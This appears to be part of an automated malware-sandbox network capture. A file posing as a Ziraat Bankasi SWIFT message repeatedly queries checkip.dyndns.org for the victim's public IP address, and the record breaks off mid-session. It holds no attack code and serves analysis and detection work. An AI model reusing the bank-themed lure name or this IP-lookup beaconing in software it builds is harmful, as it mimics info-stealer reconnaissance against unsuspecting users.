                                                                        Dec 12, 2024 21:39:53.203391075 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:39:54.472074986 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:39:54 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 070429266cd6c415661aabc543712cea
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        16192.168.2.549897193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:39:58.107630014 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:39:59.374314070 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:39:59 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: adcf7baacc925a868cd8df89f25da727
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        17192.168.2.549908193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:40:02.880841017 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:40:08.637567043 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:40:08 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 30a638896f9c0f3d3c18d030e9119dfa
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        18192.168.2.549929193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:40:12.006800890 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:40:13.283134937 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:40:13 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: fd90b3f387f7735b324509ea76711e5a
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        19192.168.2.549938193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:40:15.037293911 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:40:16.324615955 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:40:16 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: fe37a171300cd08e94dbc0514526dd74
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        20192.168.2.549947193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:40:17.986148119 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:40:19.254749060 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:40:19 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 00d69db2818e24e08db84e2da6514036
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        21192.168.2.549954193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:40:20.969639063 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:40:22.240010977 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:40:22 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 430f410cff800a70880031025ab91a25
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        22192.168.2.549961193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:40:22.479038954 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:40:23.781034946 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:40:23 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: a628a94ac52bfd92d4845404f8edac8a
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        23192.168.2.549968193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:40:25.389414072 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:40:26.670542002 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:40:26 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: f823cd9df6ee632324b12864659e7cf4
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        24192.168.2.549976193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:40:28.301419973 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:40:29.577446938 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:40:29 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 75d5f03f990161531631b92b21985bc2
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        25192.168.2.549987193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:40:31.353121042 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:40:32.660923958 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:40:32 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: d05a56bdcf69f276691176d1d1fc97b8
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        26192.168.2.549995193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:40:34.388874054 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:40:35.795852900 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:40:35 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: c11f34b5119bdf5348264c5453adaa2e
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        27192.168.2.550004193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:40:37.437674046 CET127OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Dec 12, 2024 21:40:38.777966976 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:40:38 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: e73302466b2fecb3795dc32dea2f5c77
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        28192.168.2.550011193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:40:40.425350904 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:40:41.715639114 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:40:41 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 4d71ee81d5045dc9f936af0f67522457
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        29192.168.2.550020193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:40:43.343158960 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:40:44.619431019 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:40:44 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 00753dc518c627200b98ba76616bee04
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        30192.168.2.550029193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:40:46.325174093 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:40:47.604540110 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:40:47 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 4dff136270386aa345ca433ea21255a4
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        31192.168.2.550036193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:40:49.214653015 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:40:50.482580900 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:40:50 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 835ef1e16e647fbbbd957a99b8f4450a
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        32192.168.2.550045193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:40:52.158238888 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:40:53.438178062 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:40:53 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: c573e785c4332612a2a0abd454298575
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        33192.168.2.550047193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:40:55.102468967 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:40:56.431979895 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:40:56 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 43f487dd66a689fb5b6be1013d4fea3d
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        34192.168.2.550049193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:40:58.090575933 CET151OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                        Host: checkip.dyndns.org
                                                                        Connection: Keep-Alive
                                                                        Dec 12, 2024 21:40:59.371917009 CET321INHTTP/1.1 200 OK
                                                                        Date: Thu, 12 Dec 2024 20:40:59 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 104
                                                                        Connection: keep-alive
                                                                        Cache-Control: no-cache
                                                                        Pragma: no-cache
                                                                        X-Request-ID: 43c84d042500889f25d9f875791dc7e1
                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        35192.168.2.550051193.122.6.16880768C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Dec 12, 2024 21:41:00.942018986 CET127OUTGET / HTTP/1.1
